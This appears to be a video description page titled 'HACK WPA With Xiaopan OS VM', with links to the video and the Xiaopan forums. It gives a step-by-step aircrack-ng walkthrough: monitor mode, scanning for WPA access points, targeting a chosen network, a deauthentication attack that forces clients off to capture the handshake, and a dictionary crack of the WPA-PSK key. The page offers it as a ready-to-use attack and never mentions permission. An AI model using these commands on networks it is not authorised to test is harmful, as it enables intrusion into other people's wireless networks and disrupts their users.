HACK WPA With Xiaopan OS VM
Описание
Xiaopan OS VM:
http://www.youtube.com/watch?v=NS65LPdTJrM
Xiaopan:
http://xiaopan.co/forums/
http://xiaopan.co/forums/members/aby-m.18397/
____________________________________________________________
Step 1: Start Xiaopan OS VM
Step 1a: Attach Wi-Fi USB adaptor to VM
Step 2: Scan Area
Step 2a:
Place Wi-Fi adaptor into monitor mode
airmon-ng start wlan0
Step 2b:
Scan Area for WPA AP(Access Point)
"airodump-ng --encrypt WPA mon0"
"Ctrl + C" when Target AP found
Step 3: Targeted Scan
Step 3a: Pick your Target AP, begin scan
airodump-ng -c [channel] -w [output name] --bssid [ Target AP bssid] mon0
Step 4: Capture WPA-PSK Handshake
Step 4a:
Passive Capture(Wait for connection)
Active Capture (Force re-connection)
aireplay-ng -0 10 -a [AP BSSID] -c [Client BSSID] mon0
Step 5: Crack the WPA-PSK
aircrack-ng [.cap] -w [Dictionary File]
Рекомендуемые видео



















